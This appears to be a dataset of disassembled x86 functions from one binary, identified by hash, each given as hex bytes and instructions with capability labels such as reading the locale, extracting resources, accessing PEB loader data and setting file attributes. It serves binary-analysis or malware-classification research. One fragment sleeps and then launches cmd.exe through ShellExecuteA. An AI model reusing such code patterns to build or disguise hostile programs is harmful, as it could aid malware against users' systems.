"mov eax, dword [ebp - 0x14]",
"mov ecx, str.Delay",
"mov ebx, dword [ebp - 0x14]",
"mov ebx, dword [ebx]",
"call dword [ebx + 0x84]",
"mov edx, dword [ebp - 4]",
"mov dword [edx*8 + 0x5d567c], eax",
"mov eax, dword [ebp - 4]",
"push dword [eax*8 + 0x5d567c]",
"call sub.kernel32.dll_Sleep",
"push 0",
"push 0",
"lea eax, [ebp - 0x40]",
"call fcn.00403b00",
"push 0",
"mov eax, dword [ebp - 4]",
"mov ecx, dword [eax*8 + 0x5d5678]",
"mov edx, 0x586fc4",
"lea eax, [ebp - 0x40]",
"call fcn.00408ac0",
"mov eax, dword [ebp - 0x40]",
"test eax, eax",
"jne 0x427673",
"mov eax, 0x5d42f0",
"push eax",
"mov eax, str.cmd.exe",
"push eax",
"mov eax, str.open",
"push eax",
"mov eax, 0x7530",
"call fcn.0040eea0",
"add eax, 0x3e8",
"push eax",
"call sub.shell32.dll_ShellExecuteA",
"cmp dword [ebp - 4], 5",
"jl 0x427540",
"mov eax, dword [ebp - 0x14]",
"call fcn.0040cf90",
"mov eax, dword [0x5670c0]",
"mov edx, dword [0x5670c0]",
"mov edx, dword [edx]",
"call dword [edx + 0xfc]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00427170",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x427a50
|
[
"Accept command line arguments"
] |
5589e58da424d8fdffff53c785d8fdffff0000000031c068407a42005568a042410064ff30648920c705d0575d000000000068080200008d85e0fdffff506a00e8eb9afdff8945fc66c78445e0fdffff00008b4dfc31d289e8e8720200008b4dfcd1e1a1c0575d008b108d85e0fdffffe85bbbfdffc785dcfdffff00000000e8bc9afdff8985dcfdffffe8c1ccfdff8945f489c28d85d8fdffffe8512cfeff8b4df4d1e18b85dcfdffff8b95d8fdffffe81bbbfdffc745f001000000e9ce0100008345f0018b45f03b45f47f128b85d8fdffff8b55f066817c50fe200076e28b45f03b45f40f8fa101000089f6c645e8008b45f08945f8c745fc00000000e96e0000008b85d8fdffff8b55f0668b4450fe663d0100724c662d2000760a662d02007410eb3e807de80074468345fc01eb348b45f03b45f47d1f8b95d8fdffff8b45f083c00166817c42fe2200740a807de8000f9445e8eb0d8345f001eb078345fc018345f0018b45f03b45f47e90833dd0575d00000f8ef30000008b4dfc8b15d0575d0089e8e82b010000c645e8008b45f88945f0c745ec01000000e9c10000008b95d8fdffff8b45f0668b4442fe663d01000f8278000000662d2000760e662d0200743ce967000000807de8000f8492000000a1c0575d008b15d0575d008b1c908b4dec8b85d8fdffff8b55f0668b4450fe6689444bfe8345ec01eb588b45f03b45f47d1f8b95d8fdffff8b45f083c00166817c42fe2200740a807de8000f9445e8eb318345f001eb2b8b15c0575d00a1d0575d008b1c828b4dec8b95d8fdffff8b45f0668b4442fe6689444bfe8345ec018345f0018b45f03b45f40f8e38ffffff8305d0575d00018b45f03b45f40f8e39feffff832dd0575d000166813d30305d00e9fd7507e82efcffff89f631c05a83c40c64891089e8e82cfdffff5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x228]",
"push ebx",
"mov dword [ebp - 0x228], 0",
"xor eax, eax",
"push fcn.00427a40",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [0x5d57d0], 0",
"push 0x208",
"lea eax, [ebp - 0x220]",
"push eax",
"push 0",
"call sub.kernel32.dll_GetModuleFileNameW",
"mov dword [ebp - 4], eax",
"mov word [ebp + eax*2 - 0x220], 0",
"mov ecx, dword [ebp - 4]",
"xor edx, edx",
"mov eax, ebp",
"call fcn.00427d20",
"mov ecx, dword [ebp - 4]",
"shl ecx, 1",
"mov eax, dword [0x5d57c0]",
"mov edx, dword [eax]",
"lea eax, [ebp - 0x220]",
"call fcn.00403620",
"mov dword [ebp - 0x224], 0",
"call sub.kernel32.dll_GetCommandLineW",
"mov dword [ebp - 0x224], eax",
"call fcn.004047a0",
"mov dword [ebp - 0xc], eax",
"mov edx, eax",
"lea eax, [ebp - 0x228]",
"call fcn.0040a740",
"mov ecx, dword [ebp - 0xc]",
"shl ecx, 1",
"mov eax, dword [ebp - 0x224]",
"mov edx, dword [ebp - 0x228]",
"call fcn.00403620",
"mov dword [ebp - 0x10], 1",
"jmp 0x427cdf",
"add dword [ebp - 0x10], 1",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jg 0x427b3e",
"mov eax, dword [ebp - 0x228]",
"mov edx, dword [ebp - 0x10]",
"cmp word [eax + edx*2 - 2], 0x20",
"jbe 0x427b20",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jg 0x427ceb",
"mov esi, esi",
"mov byte [ebp - 0x18], 0",
"mov eax, dword [ebp - 0x10]",
"mov dword [ebp - 8], eax",
"mov dword [ebp - 4], 0",
"jmp 0x427bd0",
"mov eax, dword [ebp - 0x228]",
"mov edx, dword [ebp - 0x10]",
"mov ax, word [eax + edx*2 - 2]",
"cmp ax, 1",
"jb 0x427bc8",
"sub ax, 0x20",
"jbe 0x427b8c",
"sub ax, 2",
"je 0x427b98",
"jmp 0x427bc8",
"cmp byte [ebp - 0x18], 0",
"je 0x427bd8",
"add dword [ebp - 4], 1",
"jmp 0x427bcc",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jge 0x427bbf",
"mov edx, dword [ebp - 0x228]",
"mov eax, dword [ebp - 0x10]",
"add eax, 1",
"cmp word [edx + eax*2 - 2], 0x22",
"je 0x427bbf",
"cmp byte [ebp - 0x18], 0",
"sete byte [ebp - 0x18]",
"jmp 0x427bcc",
"add dword [ebp - 0x10], 1",
"jmp 0x427bcc",
"add dword [ebp - 4], 1",
"add dword [ebp - 0x10], 1",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jle 0x427b68",
"cmp dword [0x5d57d0], 0",
"jle 0x427cd8",
"mov ecx, dword [ebp - 4]",
"mov edx, dword [0x5d57d0]",
"mov eax, ebp",
"call fcn.00427d20",
"mov byte [ebp - 0x18], 0",
"mov eax, dword [ebp - 8]",
"mov dword [ebp - 0x10], eax",
"mov dword [ebp - 0x14], 1",
"jmp 0x427ccc",
"mov edx, dword [ebp - 0x228]",
"mov eax, dword [ebp - 0x10]",
"mov ax, word [edx + eax*2 - 2]",
"cmp ax, 1",
"jb 0x427ca0",
"sub ax, 0x20",
"jbe 0x427c3c",
"sub ax, 2",
"je 0x427c70",
"jmp 0x427ca0",
"cmp byte [ebp - 0x18], 0",
"je 0x427cd8",
"mov eax, dword [0x5d57c0]",
"mov edx, dword [0x5d57d0]",
"mov ebx, dword [eax + edx*4]",
"mov ecx, dword [ebp - 0x14]",
"mov eax, dword [ebp - 0x228]",
"mov edx, dword [ebp - 0x10]",
"mov ax, word [eax + edx*2 - 2]",
"mov word [ebx + ecx*2 - 2], ax",
"add dword [ebp - 0x14], 1",
"jmp 0x427cc8",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jge 0x427c97",
"mov edx, dword [ebp - 0x228]",
"mov eax, dword [ebp - 0x10]",
"add eax, 1",
"cmp word [edx + eax*2 - 2], 0x22",
"je 0x427c97",
"cmp byte [ebp - 0x18], 0",
"sete byte [ebp - 0x18]",
"jmp 0x427cc8",
"add dword [ebp - 0x10], 1",
"jmp 0x427cc8",
"mov edx, dword [0x5d57c0]",
"mov eax, dword [0x5d57d0]",
"mov ebx, dword [edx + eax*4]",
"mov ecx, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x228]",
"mov eax, dword [ebp - 0x10]",
"mov ax, word [edx + eax*2 - 2]",
"mov word [ebx + ecx*2 - 2], ax",
"add dword [ebp - 0x14], 1",
"add dword [ebp - 0x10], 1",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jle 0x427c10",
"add dword [0x5d57d0], 1",
"mov eax, dword [ebp - 0x10]",
"cmp eax, dword [ebp - 0xc]",
"jle 0x427b24",
"sub dword [0x5d57d0], 1",
"cmp word [0x5d3030], 0xfde9",
"jne 0x427d04",
"call fcn.00427930",
"mov esi, esi",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00427a40",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x428190
|
[
"Get geographical location"
] |
5589e58d6424dc8945fc8955f8884df46a048d45e850ff75f8ff75fce81f94fdff8945e483f8020f8e7d0000008b45e483e80285c00f8c8b000000c745e0ffffffff8db6000000008b55e083c2018955e0668b5455e8668955dc8b55e0668b5455e86681fa20000f82590000006681ea2000742c6681ea800074256681ea621f72446681ea010076176681ea060074106681ea2600752f90eb063b45e07fa38d7600eb1c837de402750a668b45e8668945dceb0c8a45f4e8be2ffeff668945dc668b45dc662d7f007674662d21000f847e000000662d17000f8480000000662d22020f8482000000662d92030f8480000000662d01000f847e000000662d96190f847c000000662d01000f847a000000662d06000f8478000000662d0b000f847e000000662d1b000f846c000000662d67030f8472000000e975000000668b45dce8d32ffeff8845f0e96b000000c645f020e95f000000c645f02ee953000000c645f027eb4ac645f02ceb42c645f027eb3ac645f020eb32c645f020eb2ac645f020eb22c645f020eb1ac645f02deb12c645f027eb0a8a45f48845f089f68a45f089ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x24]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], edx",
"mov byte [ebp - 0xc], cl",
"push 4",
"lea eax, [ebp - 0x18]",
"push eax",
"push dword [ebp - 8]",
"push dword [ebp - 4]",
"call sub.kernel32.dll_GetLocaleInfoW",
"mov dword [ebp - 0x1c], eax",
"cmp eax, 2",
"jle 0x42823a",
"mov eax, dword [ebp - 0x1c]",
"sub eax, 2",
"test eax, eax",
"jl 0x428256",
"mov dword [ebp - 0x20], 0xffffffff",
"lea esi, [esi]",
"mov edx, dword [ebp - 0x20]",
"add edx, 1",
"mov dword [ebp - 0x20], edx",
"mov dx, word [ebp + edx*2 - 0x18]",
"mov word [ebp - 0x24], dx",
"mov edx, dword [ebp - 0x20]",
"mov dx, word [ebp + edx*2 - 0x18]",
"cmp dx, 0x20",
"jb 0x428256",
"sub dx, 0x20",
"je 0x428230",
"sub dx, 0x80",
"je 0x428230",
"sub dx, 0x1f62",
"jb 0x428256",
"sub dx, 1",
"jbe 0x428230",
"sub dx, 6",
"je 0x428230",
"sub dx, 0x26",
"jne 0x428256",
"nop",
"jmp 0x428230",
"cmp eax, dword [ebp - 0x20]",
"jg 0x4281d8",
"lea esi, [esi]",
"jmp 0x428256",
"cmp dword [ebp - 0x1c], 2",
"jne 0x42824a",
"mov ax, word [ebp - 0x18]",
"mov word [ebp - 0x24], ax",
"jmp 0x428256",
"mov al, byte [ebp - 0xc]",
"call fcn.0040b210",
"mov word [ebp - 0x24], ax",
"mov ax, word [ebp - 0x24]",
"sub ax, 0x7f",
"jbe 0x4282d4",
"sub ax, 0x21",
"je 0x4282e8",
"sub ax, 0x17",
"je 0x4282f4",
"sub ax, 0x222",
"je 0x428300",
"sub ax, 0x392",
"je 0x428308",
"sub ax, 1",
"je 0x428310",
"sub ax, 0x1996",
"je 0x428318",
"sub ax, 1",
"je 0x428320",
"sub ax, 6",
"je 0x428328",
"sub ax, 0xb",
"je 0x428338",
"sub ax, 0x1b",
"je 0x428330",
"sub ax, 0x367",
"je 0x428340",
"jmp 0x428348",
"mov ax, word [ebp - 0x24]",
"call fcn.0040b2b0",
"mov byte [ebp - 0x10], al",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x20",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x2e",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x27",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x2c",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x27",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x20",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x20",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x20",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x20",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x2d",
"jmp 0x428350",
"mov byte [ebp - 0x10], 0x27",
"jmp 0x428350",
"mov al, byte [ebp - 0xc]",
"mov byte [ebp - 0x10], al",
"mov esi, esi",
"mov al, byte [ebp - 0x10]",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x435600
|
[
"Extract resource via kernel32 functions"
] |
5589e58da424e8feffff53565789c689d7898de8feffff8b450c8985ecfeffff8a45088885f0feffffc745f40000000031c068f05543005568a042410064ff30648920ffb5ecfeffffffb5e8feffff57e83bbefcff89461085c00f85b00000008a85f0feffff84c0746f68ff0000008b85e8feffff8d8df4feffffbaffffffffe84bf7fcff8d4df46631d28d85f4feffffe8aa3bfdff30c96631d28d45f4e86d49fdff8b45f48945fcc745f80b0000008d45f8506a008b0da4805600ba01000000b800905800e8a5960100ba6a56430089e9e889eafdffeb378b85e8feffff8945fcc745f8060000008d45f8506a008b0da4805600ba01000000b800905800e86c960100bad956430089e9e850eafdffff761057e897bdfcff89461485c00f85b00000008a85f0feffff84c0746f68ff0000008b85e8feffff8d8df4feffffbaffffffffe887f6fcff8d4df46631d28d85f4feffffe8e63afdff30c96631d28d45f4e8a948fdff8b45f48945fcc745f80b0000008d45f8506a008b0da4805600ba01000000b800905800e8e1950100ba2e57430089e9e8c5e9fdffeb378b85e8feffff8945fcc745f8060000008d45f8506a008b0da4805600ba01000000b800905800e8a8950100ba9d57430089e9e88ce9fdffff761057e8e3bcfcff89c3ff7614e8e9bcfcff89c289f089d9e89ef7ffff31c05a83c40c64891089e8e8eefdffff5f5e5b89ec5dc20800
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x118]",
"push ebx",
"push esi",
"push edi",
"mov esi, eax",
"mov edi, edx",
"mov dword [ebp - 0x118], ecx",
"mov eax, dword [ebp + 0xc]",
"mov dword [ebp - 0x114], eax",
"mov al, byte [ebp + 8]",
"mov byte [ebp - 0x110], al",
"mov dword [ebp - 0xc], 0",
"xor eax, eax",
"push fcn.004355f0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"push dword [ebp - 0x114]",
"push dword [ebp - 0x118]",
"push edi",
"call sub.kernel32.dll_FindResourceA",
"mov dword [esi + 0x10], eax",
"test eax, eax",
"jne 0x435710",
"mov al, byte [ebp - 0x110]",
"test al, al",
"je 0x4356d9",
"push 0xff",
"mov eax, dword [ebp - 0x118]",
"lea ecx, [ebp - 0x10c]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0xc]",
"xor dx, dx",
"lea eax, [ebp - 0x10c]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0xc]",
"call fcn.0040a010",
"mov eax, dword [ebp - 0xc]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], 0xb",
"lea eax, [ebp - 8]",
"push eax",
"push 0",
"mov ecx, dword [str.Resource___s__not_found]",
"mov edx, 1",
"mov eax, 0x589000",
"call fcn.0044ed70",
"mov edx, 0x43566a",
"mov ecx, ebp",
"call fcn.00414160",
"jmp 0x435710",
"mov eax, dword [ebp - 0x118]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], 6",
"lea eax, [ebp - 8]",
"push eax",
"push 0",
"mov ecx, dword [str.Resource___s__not_found]",
"mov edx, 1",
"mov eax, 0x589000",
"call fcn.0044ed70",
"mov edx, 0x4356d9",
"mov ecx, ebp",
"call fcn.00414160",
"push dword [esi + 0x10]",
"push edi",
"call sub.kernel32.dll_LoadResource",
"mov dword [esi + 0x14], eax",
"test eax, eax",
"jne 0x4357d4",
"mov al, byte [ebp - 0x110]",
"test al, al",
"je 0x43579d",
"push 0xff",
"mov eax, dword [ebp - 0x118]",
"lea ecx, [ebp - 0x10c]",
"mov edx, 0xffffffff",
"call fcn.00404dd0",
"lea ecx, [ebp - 0xc]",
"xor dx, dx",
"lea eax, [ebp - 0x10c]",
"call fcn.00409240",
"xor cl, cl",
"xor dx, dx",
"lea eax, [ebp - 0xc]",
"call fcn.0040a010",
"mov eax, dword [ebp - 0xc]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], 0xb",
"lea eax, [ebp - 8]",
"push eax",
"push 0",
"mov ecx, dword [str.Resource___s__not_found]",
"mov edx, 1",
"mov eax, 0x589000",
"call fcn.0044ed70",
"mov edx, 0x43572e",
"mov ecx, ebp",
"call fcn.00414160",
"jmp 0x4357d4",
"mov eax, dword [ebp - 0x118]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], 6",
"lea eax, [ebp - 8]",
"push eax",
"push 0",
"mov ecx, dword [str.Resource___s__not_found]",
"mov edx, 1",
"mov eax, 0x589000",
"call fcn.0044ed70",
"mov edx, 0x43579d",
"mov ecx, ebp",
"call fcn.00414160",
"push dword [esi + 0x10]",
"push edi",
"call sub.kernel32.dll_SizeofResource",
"mov ebx, eax",
"push dword [esi + 0x14]",
"call sub.kernel32.dll_LockResource",
"mov edx, eax",
"mov eax, esi",
"mov ecx, ebx",
"call fcn.00434f90",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004355f0",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 8"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x438890
|
[
"Access peb ldr_data"
] |
5589e58d6424f48945f88955fcb88c9c5800e83945fdff84c00f84c70000008b45fc8945f48b45f8e8d300000031c068808843005568a042410064ff306489208b45f88b55f88b12ff92c40000008b55f88b45f48a40188842188b55f88b45f48a401a88421a8b55f88b45f48a401b88421b8b55f88b45f48a401c88421c8b55f88b45f48b40288942288b45f48b50308b45f883c030e89500fdff8b55f88b45f48b402c89422c8b45f48b500c8b45f8e85bf1ffff8b45f48b50108b45f8e89decffff8b55f48b45f88b4df88b09ff91b000000031c05a83c40c64891089e8e80cffffffeb0b8b55fc8b45f8e89f24000089ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0xc]",
"mov dword [ebp - 8], eax",
"mov dword [ebp - 4], edx",
"mov eax, 0x589c8c",
"call fcn.0040cde0",
"test al, al",
"je 0x438976",
"mov eax, dword [ebp - 4]",
"mov dword [ebp - 0xc], eax",
"mov eax, dword [ebp - 8]",
"call fcn.00438990",
"xor eax, eax",
"push fcn.00438880",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 8]",
"mov edx, dword [edx]",
"call dword [edx + 0xc4]",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0xc]",
"mov al, byte [eax + 0x18]",
"mov byte [edx + 0x18], al",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0xc]",
"mov al, byte [eax + 0x1a]",
"mov byte [edx + 0x1a], al",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0xc]",
"mov al, byte [eax + 0x1b]",
"mov byte [edx + 0x1b], al",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0xc]",
"mov al, byte [eax + 0x1c]",
"mov byte [edx + 0x1c], al",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 0x28]",
"mov dword [edx + 0x28], eax",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [eax + 0x30]",
"mov eax, dword [ebp - 8]",
"add eax, 0x30",
"call fcn.004089c0",
"mov edx, dword [ebp - 8]",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 0x2c]",
"mov dword [edx + 0x2c], eax",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [eax + 0xc]",
"mov eax, dword [ebp - 8]",
"call fcn.00437aa0",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [eax + 0x10]",
"mov eax, dword [ebp - 8]",
"call fcn.004375f0",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov ecx, dword [ebp - 8]",
"mov ecx, dword [ecx]",
"call dword [ecx + 0xb0]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00438880",
"jmp 0x438981",
"mov edx, dword [ebp - 4]",
"mov eax, dword [ebp - 8]",
"call fcn.0043ae20",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x444dd0
|
[
"Get file version info"
] |
5589e58da424e0f3ffff8945fcc785f0f3ffff0000000031c068c04d44005568a042410064ff30648920c745f8ffffff0f8b55fc8d85f0f3ffffe8b13bfcff8d85f0f3ffffe826edfbff8d85e4f3ffff508b85f0f3ffff85c07505b8f0425d0050e87adcfbff8985e8f3ffff3d000c00000f86930000008b95e8f3ffff8d85f4f3ffffe8c8a9fcff31c068b04d44005568a042410064ff30648920ffb5f4f3ffffffb5e8f3ffffffb5e4f3ffff8b85f0f3ffff85c07505b8f0425d0050e82edcfbff85c074328d85ecf3ffff508d85e0f3ffff50b8ace7580050ffb5f4f3ffffe81bdcfbff85c0740f8b85e0f3ffff8b40088945f88d760031c05a83c40c64891089e8e8d8feffffeb5e8d85f8f3ffff50ffb5e8f3ffffffb5e4f3ffff8b85f0f3ffff85c07505b8f0425d0050e8bedbfbff85c074328d85ecf3ffff508d85e0f3ffff50b8ace75800508d85f8f3ffff50e8aadbfbff85c0740e8b85e0f3ffff8b40088945f889f631c05a83c40c64891089e8e878feffff8b45f889ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0xc20]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 0xc10], 0",
"xor eax, eax",
"push fcn.00444dc0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [ebp - 8], 0xfffffff",
"mov edx, dword [ebp - 4]",
"lea eax, [ebp - 0xc10]",
"call fcn.004089c0",
"lea eax, [ebp - 0xc10]",
"call fcn.00403b40",
"lea eax, [ebp - 0xc1c]",
"push eax",
"mov eax, dword [ebp - 0xc10]",
"test eax, eax",
"jne 0x444e30",
"mov eax, 0x5d42f0",
"push eax",
"call sub.version.dll_GetFileVersionInfoSizeA",
"mov dword [ebp - 0xc18], eax",
"cmp eax, 0xc00",
"jbe 0x444eda",
"mov edx, dword [ebp - 0xc18]",
"lea eax, [ebp - 0xc0c]",
"call fcn.0040f820",
"xor eax, eax",
"push fcn.00444db0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"push dword [ebp - 0xc0c]",
"push dword [ebp - 0xc18]",
"push dword [ebp - 0xc1c]",
"mov eax, dword [ebp - 0xc10]",
"test eax, eax",
"jne 0x444e8c",
"mov eax, 0x5d42f0",
"push eax",
"call sub.version.dll_GetFileVersionInfoA",
"test eax, eax",
"je 0x444ec8",
"lea eax, [ebp - 0xc14]",
"push eax",
"lea eax, [ebp - 0xc20]",
"push eax",
"mov eax, 0x58e7ac",
"push eax",
"push dword [ebp - 0xc0c]",
"call sub.version.dll_VerQueryValueA",
"test eax, eax",
"je 0x444ec8",
"mov eax, dword [ebp - 0xc20]",
"mov eax, dword [eax + 8]",
"mov dword [ebp - 8], eax",
"lea esi, [esi]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00444db0",
"jmp 0x444f38",
"lea eax, [ebp - 0xc08]",
"push eax",
"push dword [ebp - 0xc18]",
"push dword [ebp - 0xc1c]",
"mov eax, dword [ebp - 0xc10]",
"test eax, eax",
"jne 0x444efc",
"mov eax, 0x5d42f0",
"push eax",
"call sub.version.dll_GetFileVersionInfoA",
"test eax, eax",
"je 0x444f38",
"lea eax, [ebp - 0xc14]",
"push eax",
"lea eax, [ebp - 0xc20]",
"push eax",
"mov eax, 0x58e7ac",
"push eax",
"lea eax, [ebp - 0xc08]",
"push eax",
"call sub.version.dll_VerQueryValueA",
"test eax, eax",
"je 0x444f38",
"mov eax, dword [ebp - 0xc20]",
"mov eax, dword [eax + 8]",
"mov dword [ebp - 8], eax",
"mov esi, esi",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00444dc0",
"mov eax, dword [ebp - 8]",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4502c0
|
[
"Check if file exists",
"Get file attributes"
] |
5589e58da42494fdffff53568945fc8855f888cbbab0f658008d8598fdffffe8ece2fbff31c068a00245005568a042410064ff306489208b45fc85c07505b8f0425d0050e8b70efbff89c683feff753be81b0dfbff3da10000007603f8eb070fa30580ec5800721789e8e8c100000084c0740cc68594fdffff01e991000000c68594fdffff00e98500000089f083e0100fb655f83b0495307e56000f948594fdffff88d8228594fdffff0f846000000081e60004000074588d9d98fdffffbab0f6580089d8e806e3fbff89da8b45fc30c9e8cafbffff85c0740a83e801741deb278a55f88b8598fdffff30c9e80cffffff888594fdffffeb14c68594fdffff01eb0bc68594fdffff009031c05a83c40c64891089e8e8c0feffff8a8594fdffff5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x26c]",
"push ebx",
"push esi",
"mov dword [ebp - 4], eax",
"mov byte [ebp - 8], dl",
"mov bl, cl",
"mov edx, 0x58f6b0",
"lea eax, [ebp - 0x268]",
"call fcn.0040e5d0",
"xor eax, eax",
"push fcn.004502a0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 4]",
"test eax, eax",
"jne 0x450303",
"mov eax, 0x5d42f0",
"push eax",
"call sub.kernel32.dll_GetFileAttributesW",
"mov esi, eax",
"cmp esi, 0xffffffff",
"jne 0x45034b",
"call sub.kernel32.dll_GetLastError",
"cmp eax, 0xa1",
"jbe 0x45031f",
"clc",
"jmp 0x450326",
"bt dword [0x58ec80], eax",
"jb 0x45033f",
"mov eax, ebp",
"call fcn.004503f0",
"test al, al",
"je 0x45033f",
"mov byte [ebp - 0x26c], 1",
"jmp 0x4503d0",
"mov byte [ebp - 0x26c], 0",
"jmp 0x4503d0",
"mov eax, esi",
"and eax, 0x10",
"movzx edx, byte [ebp - 8]",
"cmp eax, dword [edx*4 + 0x567e30]",
"sete byte [ebp - 0x26c]",
"mov al, bl",
"and al, byte [ebp - 0x26c]",
"je 0x4503d0",
"and esi, 0x400",
"je 0x4503d0",
"lea ebx, [ebp - 0x268]",
"mov edx, 0x58f6b0",
"mov eax, ebx",
"call fcn.0040e690",
"mov edx, ebx",
"mov eax, dword [ebp - 4]",
"xor cl, cl",
"call fcn.0044ff60",
"test eax, eax",
"je 0x4503a4",
"sub eax, 1",
"je 0x4503bc",
"jmp 0x4503c8",
"mov dl, byte [ebp - 8]",
"mov eax, dword [ebp - 0x268]",
"xor cl, cl",
"call fcn.004502c0",
"mov byte [ebp - 0x26c], al",
"jmp 0x4503d0",
"mov byte [ebp - 0x26c], 1",
"jmp 0x4503d0",
"mov byte [ebp - 0x26c], 0",
"nop",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004502a0",
"mov al, byte [ebp - 0x26c]",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4506f0
|
[
"Get file attributes"
] |
5589e585c07505b8f0425d0050e8be0afbff89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"test eax, eax",
"jne 0x4506fc",
"mov eax, 0x5d42f0",
"push eax",
"call sub.kernel32.dll_GetFileAttributesW",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x450710
|
[
"Set file attributes"
] |
5589e5535285c07505b8f0425d0050e87c0efbff85c0740431dbeb07e8ff08fbff89c389d85b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"push ebx",
"push edx",
"test eax, eax",
"jne 0x45071e",
"mov eax, 0x5d42f0",
"push eax",
"call sub.kernel32.dll_SetFileAttributesW",
"test eax, eax",
"je 0x45072c",
"xor ebx, ebx",
"jmp 0x450733",
"call sub.kernel32.dll_GetLastError",
"mov ebx, eax",
"mov eax, ebx",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4507d0
|
[
"Get geographical location"
] |
